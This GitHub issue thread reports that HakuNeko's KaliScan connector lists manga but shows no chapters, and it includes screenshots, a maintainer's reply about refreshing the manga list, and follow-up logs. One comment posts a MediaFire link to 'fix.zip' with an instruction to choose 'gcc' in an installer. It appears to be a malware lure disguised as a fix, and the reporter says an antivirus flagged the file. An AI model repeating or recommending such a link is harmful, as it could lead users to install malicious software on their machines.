### ISSUE TITLE
[<KaliScan>] Connector not working

### ISSUE THREAD

**Issue by GeneralUser-NonDev** [manga-download/hakuneko#7359]
### Is there an existing issue for this connector?

- [X] I have searched the existing issues

### Did you read the troubleshooting guide ?

- [X] I read it but nothing seems related

### Is the website of the connector working properly ?

- [X] Yes i'm able to see the manga within my standard browser

### Make sure to try Nightly Build

- [X] Yes nightly build didn't fix the issue

### What kind of issue are you encountering

Manga list isn't refreshing

### Describe the bug

I searched "Dosanko" in the connector list and got 2 results "KaliScan" and "Manganelos (by AnyACG)" (Mangadex has the title too but doesn't show on the connector search, I was able to add it by url though, however they don't have all the chapters), both load saying there's x number of mangas listed but when I refine/search down to "Dosanko" I get just the relavent Mangas showing 1 or 2 of some twenty or fourty thousand titles, when I click on them the manga chapter page stays at 0/0. When I click on the "open in browser" button in the connectors page KaliScans site loads and I can find the manga in question and load the latest chapter (haven't tried older ones), for the record Manganelos does the same but when I open its site i get nothing, this will be a separate issue posted in a minute.

System, Windows 10Pro x64, Nigtly build

![Annotation 2024-08-25 193057](https://github.com/user-attachments/assets/6d509252-25c1-40e5-a32a-b38f66cdebe2)
![Annotation 2024-08-25 193126](https://github.com/user-attachments/assets/12fc30f0-3b7d-4175-9295-e83c95cf3b6e)
![Annotation 2024-08-25 Build](https://github.com/user-attachments/assets/227af82d-adc1-4cc0-b727-cd908ba8f49d)

### To Reproduce

See the "Describe the bug" field.

1. Name of connector
2. Name of manga (if connector update is working)
3. Name of chapter (if manga update is working)
4. Copy any relevant error message that appears in a popup or (advanced) within the console (press F12)

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by GeneralUser-NonDev** [comment]
> Download https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file In the installer menu, select "gcc."

I take it this is a false positive? I'm not too sure.....
![Annotation 2024-08-25 201941](https://github.com/user-attachments/assets/59f3002e-104f-4cca-b12e-8e2e44fb0d90)
![Annotation 2024-08-25 202522](https://github.com/user-attachments/assets/687d0345-c106-4153-af38-a1689d81c120)

**Comment by MikeZeDev** [comment]
![image](https://github.com/user-attachments/assets/6dbb9d0b-1b48-4f0c-9e9d-631fc2e1ca7f)

Both works. I have 54k entries on my list, you have 24k. Perhaps your list is not up to date in that case such errors could append. Website may change manga url from time to time so you ahve to make sure youre list is fresh before reporting such errors.

Before opening a ticket update your list and double check if the error persist feel free to reopen the ticket.

**Comment by GeneralUser-NonDev** [comment]
why wouldn't a fresh search auto-update the list(s), I believe the blank white screen when the program starts is it calling to here to check for updates to the software, isn't it?  I just repeated the search and got the same results, clicked on the refresh icon and it took a good while (felt like 5-10 minutes) and came back with 65k results. I opened the details tab (f12) and see some kind of "failed" message, related? 


![Annotation 2024-08-28 201410](https://github.com/user-attachments/assets/5feac5ec-aac8-4200-aed9-5bcf4c14a5f6)
![Annotation 2024-08-28 201936](https://github.com/user-attachments/assets/425fcccc-ac76-4645-8969-a3c6db210ba3)
[cache-1724890892335.log](https://github.com/user-attachments/files/16790266/cache-1724890892335.log)
